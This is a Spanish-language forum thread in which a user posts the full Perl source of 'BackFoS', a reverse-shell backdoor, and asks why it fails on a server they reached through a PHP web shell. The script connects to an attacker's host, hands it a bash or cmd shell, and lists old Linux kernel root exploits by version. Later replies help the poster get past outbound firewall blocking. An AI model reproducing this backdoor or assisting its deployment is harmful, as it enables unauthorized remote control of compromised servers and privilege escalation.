[SOLUCIONADO] Problema con BackFoS

Iniciado por deni_celine, Febrero 09, 2014, 03:04:20 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Febrero 09, 2014, 03:04:20 PM Ultima modificación: Agosto 18, 2014, 08:15:17 PM por Expermicid
Antes que nada, NO se nada sobre este tema... asi que si alguien me puede orientar un poco.. gracias!
Estoy probando un backdoor en perl llamado "BackFoS" que encontre en internet, por lo que entiendo funciona igual que la mayoria, con una conexion inversa por medio de socket, al probarlo desde un pc de preubas con linux funciona perfectamente, pero al correrlo en un servidor mediante una shell en php no me funciona, lo ultimo que imprime es la linea 39. A que se podria deber esto?

Dejo el codigo tal cual lo encontre

Código: perl

#!/usr/bin/perl

########### BackFoS v0.3 - By FoS TeaM - [priv8] ##########
#                                                         #
#     BackFoS is a Backdoor in PERL for  All  Servers     #
#            c0dex by Vengador de las Sombras             #
#                                                         #
#          USAGE: Perl BackFoS.pl <HOST> <PORT> <OS>      #
#     You need have listen nc, cryptcar, putty or other   #
#      program on <PORT> to connect with the backdoor     #
#                                                         #
#=========================================================#
#                                                         #
#  Gr3tz to: Lutscher, WaesWaes, CHR0N05, Keynet, Fr34k,  #       
# Lëssiëm Tárálom, Phonix & ArgeniversoHack & #RE members #
#      Especial Thanx To Plaga, for the help =)           #
#                                                         #
#################### (c)FoS TeaM 2008 #####################

use IO::Socket;

print q(

=================================================
   BackFoS.pl c0dex by FoS TeaM
=================================================
);
$ARGC = @ARGV;
if ($ARGC != 3){ 
print "\nUsage: BackFoS.pl <HOST> <PORT> <OS>";
exit(0);
}

$host = $ARGV[0];
$port = $ARGV[1];
$OS = $ARGV[2];
use Socket;

print "[+]Connecting to $host ...";
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'))
                                                     || die "[-] Cannot Resolve $host";
connect(SOCKET, sockaddr_in($port, inet_aton($host)))
                                                     || die "[-] Cannot Connect to $host";

print "\n[+] Connected!";

open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");

print "\n .::BackFoS v0.3::. - FoS TeaM - [Priv8]\n\n";
if ($OS == "-l"){
$kv = "uname -r";
chomp($kv);
print "Kernel Version: $kv\n\n";
%lista=(
2.4.17=> "newlocal kmod uselib24",
2.4.18=> "brk brk2 newlocal kmod",
2.4.19=> "brk brk2 newlocal kmod",
2.4.20=> "ptrace kmod ptrace-kmod brk brk2",
2.4.21=> "brk brk2 ptrace ptrace-kmod",
2.4.22=> "brk brk2 ptrace ptrace-kmod",
2.4.22-10=> "loginx",
2.4.23=> "mremap_pte",
2.4.24=> "mremap_pte uselib24",
2.4.25-1=> "uselib24",
2.4.27=> "uselib24",
2.6.2=> "mremap_pte krad h00lyshit",
2.6.5=> "krad krad2 h00lyshit",
2.6.6=> "krad krad2 h00lyshit",
2.6.7=> "krad krad2 h00lyshit",
2.6.8=> "krad krad2 h00lyshit",
2.6.8-5=> "krad2  h00lyshit",
2.6.9=> "krad  krad2  h00lyshit",
2.6.9-34=> "r00t h00lyshit",
);

foreach $v (keys %lista) {
if ($kv =~ /$v/){
print "\n RootExploits: $lista{$v}\n";
}
}

$ejecutor = "/bin/bash";
system($ejecutor);
}

if ($OS == "-w"){
$ejecutor = "cmd";
system($ejecutor);
}



Febrero 10, 2014, 05:27:37 PM #1
Lo mas probable es que tu firewall este bloqueando la conexión.
No importa el por qué, si no cómo.
Febrero 10, 2014, 07:54:51 PM #2
Cree una regla en el firewall de windows y abri el puerto en la página de configuración del router, asi que no creo que sea eso. Me funciona bien usando mi ip privada (a nivel local), pero no funciona con la ip pública...
Febrero 10, 2014, 08:17:09 PM #3
forwardeaste los puertos? te aseguraste q el server donde entraste no tenga un firewall q bloquee las salidas a direcciones q no sean confiables?

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".
Febrero 10, 2014, 09:10:15 PM #4 Ultima modificación: Febrero 17, 2014, 04:53:20 PM por deni_celine
Tiene que ser lo del firewall que bloquee las salidas....  averiguare sobre eso, gracias por las respuestas!
Imprimir
Ir Arriba Páginas1
Acciones del Usuario